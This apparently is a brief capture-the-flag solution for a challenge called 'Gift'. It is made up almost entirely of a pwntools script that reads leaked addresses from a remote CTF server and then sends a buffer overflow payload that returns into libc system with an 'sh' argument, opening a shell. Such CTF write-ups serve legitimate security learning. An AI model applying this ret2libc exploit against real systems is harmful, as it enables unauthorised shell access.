Gift

nc ctf.j0n9hyun.xyz 3013

from pwn import *
#nc ctf.j0n9hyun.xyz 3013
#p = process("./gift")
p = remote('ctf.j0n9hyun.xyz', 3013)

p.recvuntil('Hey guyssssssssss here you are:')
tmp = p.recvline()

bss_addr = int(tmp[0:9],16)
system_addr = int(tmp[10:],16)

payload = 'aaaaa'

p.sendline(payload)
p.recvline()

payload2 = ''
payload2 += 'A'*0x88
payload2 += p32(system_addr)    # libc_system
payload2 += 'BBBB'
payload2 += p32(0x8048f48)     # sh

p.sendline(payload2)
p.interactive()

저작자표시 (새창열림)